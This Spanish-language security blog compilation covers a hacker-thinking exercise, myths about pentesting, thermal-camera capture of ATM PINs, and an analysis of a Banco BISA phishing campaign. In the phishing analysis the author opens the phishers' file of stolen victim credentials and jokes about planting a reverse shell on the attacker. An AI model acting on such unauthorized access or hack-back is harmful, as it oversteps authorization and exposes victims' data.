Sin embargo existe un punto muy importante, que distingue a un hacker, de una persona que practica el hacking, esto es… el enfoque. Podemos comparar al pensamiento del Hacker con el pensamiento lateral, nos encontraremos con caminos intransitados y que parecen sin salida, pero que gracias a la creatividad podrán ser superados (después de noches de insomnio), el famoso “Think outside the Box”.

image

Para adiestrarnos un poco a continuación publico una serie de ejercicios denominado THE JACK OF ALL TRADES SECURITY TESTING TRAINING SUPPLEMENT, hecho por el famoso Pete Herzog para la ISECOM, lo voy a postear por secciones para que tengamos tiempo de pensar.

Este es un test que se trabaja bajo escenarios, cada escenario es familiar por lo que no necesitas conocimientos técnicos, cada escenario tiene cuatro preguntas, las respuestas deben ser breves (las pueden publicar acá), las respuestas de “ciencia ficción” no son válidas, si lo toman por su cuenta, cada una debería tomarles 10 minutos. Podemos discutir las respuestas (de hecho esa es la idea).

Cada ejercicio contempla escenarios con los que comúnmente nos encontramos en un trabajo de Ethical Hacking.

Escenario Uno – Electricista

Eres un electricista. Frente a ti hay un foco colgando del techo y detrás tuyo hay un interruptor en la pared. La luz esta encendida.

1. Enumere 10 maneras de apagar la luz.

2. Enumere 10 componentes del sistema de luz.

3. Enumere 10 maneras para indicar si la luz esta apagada.

4. Enumere 10 maneras de prevenir que alguien apague la luz.

 

Espero sus respuestas!!!

Nelson Boris Murillo Prieto

¡Mamá, quiero ser pentester!

 

El trabajo de un Penetration Tester (pentester a partir de ahora) es posiblemente uno de los más mitificados en el mundo de la seguridad.

En la última Defcon ha habido una ponencia llamada "Mamma Don't Let Your Babies Grow Up to be Pen Testers - (a.k.a. Everything Your Guidance Counselor Forgot to Tell You About Pen Testing)" que precisamente pretende desmitificar con un poco de humor muchos aspectos de éste trabajo y plantear cosas que muchas personas, antes de empezar a trabajar como pentester, seguramente no se hayan planteado.

Algunas cosas interesantes que se comentan son las siguientes.

- Expectativas

  • MS Windows mola (aunque ésto es bastante personal)
  • GUI > línea de comandos
  • Ganar millones

- Realidad
  • GNU/Linux mola (de nuevo, bastante personal)
  • Línea de comandos > GUI
  • No es una mina de dinero

La autorización del pentest es sagrada, de ninguna manera se pueden sobrepasar los límites. Y por supuesto, los usuarios puede que estén avisados de que se está haciendo una auditoría.

Puede darse la posibilidad de que haya una máquina vulnerable, en la que ejecutando un comando se pueda conseguir root, pero no tienes autorización para hacerlo. ¿A que ya no es tan atractivo?

Deadlines y expectativas del cliente para nada realistas (bueno, ésto no es exclusivo de los pentesters).

Cuando tienes éxito, significa que otro ha errado en su trabajo, ya sea el sysadmin, el administrador de seguridad, el desarrollador de alguna aplicación, ...

Después del pentest hay que documentar todo el trabajo, algo que puede gustarte, o no.

Las cosas cambian, o como ellos dicen, "Scanned today Hacked tomorrow". Es posible que el trabajo perdure lo que dura el pentest.

Aún con ésto, la conclusión que dan sobre éste trabajo es muy positiva, ¡y no es para menos!

Es probable que personas no relacionadas con el mundo de la seguridad informática o aún poco cercanas vean al pentester como a Trinity cuando en Matrix II lanza un Nmap para luego explotar un fallo de SSH que le permite dejar sin luz a toda la ciudad. Nada más lejos de la realidad.

Para los interesados, aquí está la presentación que utilizaron en la ponencia.

Fuente: http://www.securitybydefault.com/2011/08/mama-quiero-ser-pentester.html

miércoles, 17 de agosto de 2011

¿Cámara térmica para capturar PINs de cajeros? Es posible

 

Hace algunos meses publiqué un video sobre el robo de PINs en los cajeros para clonar tarjetas, unas de las recomendaciones que daba era tapar el teclado de alguna forma para evitar que una cámara oculta -si la hubiera- capturara el ingreso del código.
Pues bien, ahora parece que esto ya no será suficiente, 3 investigadores han demostrado que es posible determinar el PIN ingresado con una cámara térmica que analiza el calor residual dejado en las teclas.
camara-termina-atm
En las pruebas realizadas descubrieron que en teclados de goma, los rastros quedaban durante varios segundos e incluso era posible determinar la secuencia de los números, sin embargo en los teclados metálicos el calor se disipaba rápidamente haciendo imposible el análisis (descargar paper).
La técnica nunca ha sido detectada en acción, es tecnología demasiado cara y no vale la pena arriesgar tantos billetes cuando se pueden obtener resultados con mucho menos, pero dado las ganancias "del negocio" no sería extraño que algunos lo intentaran.
Consejos para evitar el clonado de tarjetas:
El delincuente necesita dos cosas para clonar la tarjeta, la información de la banda magnética y el PIN. Así que hay que chequear la firmeza de la ranura y que no hallan elementos extraños, lo mismo hay que hacer con el teclado y al momento de ingresar la clave, es bueno taparlo para que no sea visible desde ningún ángulo.
Algunos skimmers o dispositivos de clonado, cuentan con teclados falsos que a simple vista pueden pasar desapercibidos:
teclado-falso
Otros pueden tener todo un panel falso en su frente:
panel-falso
Hay muchas variantes de estos ataques, algunos son muy elaborados como los de las fotografías anteriores y otros más simples pero ingeniosos, como el uso de pegamento en las teclas.

Fuente: http://spamloco.net/

Phishing al Banco BISA

Entre ayer y esta mañana recibí varios correos indicando que debo actualizar mis datos para el Banco BISA, un claro intento de phishing que analizamos a continuación.

El correo llega con el siguiente mensaje:

Para empezar ya se puede ver que en las cabeceras del mensaje el mismo viene desde un servidor ajeno al banco:

ovh.co.uk

El link nos dirige a la pagina beverlyhillsfashion.co.uk

Ambos sitios del Reino Unido, ahora, dependiendo que navegador utilicemos, el mismo nos dirige a la pagina o nos muestra un anuncio parecido a este:

Ello nos da un respiro de alivio mostrandonos que algunos navegadores van un paso delante con sus filtros, sin embargo para el analisis continuemos con el cargado de la pagina, el sitio tiene una copia de la estructura de la pagina sin embargo no tiene las caraceteristicas de seguridad de la pagina como el certificado digital, con un tipico formulatio de tarjeta y pin, lo interesante es que en este caso luego de pedir dichos datos, solicita el ingreso de los datos de la tarjeta de coordenadas:

Un dato muy critico para el usuario si este cae en el engaño, puesto que con ello este grupo de delincuentes se podría hacer con la autenticación de doble factor -mejor me consigo un Token OTP ;), al finalizar tenemos este mensaje:

¿Que les parece si hacemos un analisis de la página?, para comenzar se trata de un servidor con direccionamiento a www.photo-trafic.com/janvier..., esta ultima pagina sirve para reenviar el enlace hacia distinatas paginas según la disponibilidad de estas, por ejemplo al principio apuntaba al dominio ovh.co.uk, luego a svvenlo.nl/home/help/css/bisa, y el día de hoy a chin-chin.nl/stats/bisa/bisa.htm.

Si nos vamos a la carpeta superior podemos hacer un listado de los archivos de directorio (hasta un hacker debe asegurar sus aplicaciones, jejeje), y tenemos el listado de archivos, suponiendo que los datos que almacena el phishing son guardados en algun lugar es interesante el archivo dxtr.txt:

Como apreciamos en la siguiente imagen el publico ya se las conoce:

Cualquiera puede ingresar a dichas contraseñas y seguro que si indagamos un poco más podriamos identificar la vulnerabilidad plantada y el webshell cargado, como suelesiceder en estos casos, y de esta manera plantarle un shell inverso al atacante y rastrear su identidad >:) , pero simplemente subiendo algunos niveles podemos ver otros datos de interes, por ejemplo, tambien subieron un phishing para el banco de Pichincha, o al Banco Internacional:

Algunos clientes lastimosamente cayeron:

Ademas este sitio tambien sirve para almacenas phishing de hotmail:

Ahora recordemos como recibimos el correo??, alguien subio un script para envio masivo de correos:

Como ven un servicio muy completo. Algunas conclusiones:

- Vimos en este articulo como funcionan las redes de criminales digitales, esta el grupo de hackers black hat, que encuentran y logran vulnerar los servidores que alojan el ataque, los cuales luego venden el acceso a criminales para que ellos hagan el phishing, el servicio incluye el alojamiento, direccionamiento y envio de spam.

- Los phishers son atacantes mediocres, puesto que sus técnicas son muy pobres, empezando por el URL muy obvio, las fallas de ortografía y la trazabilidad de sus acciones.

- La seguridad al usuario se vuelve un pretexto para el cambio de datos para los atacantes por lo que no esta nada mal, difundir este tipo de articulos para que los usuarios estén alertas.

Esperamos sus comentarios, desde Yanapti estaremos brindando información acerca de estos tipos de ataques comunmente utilizados.

Grax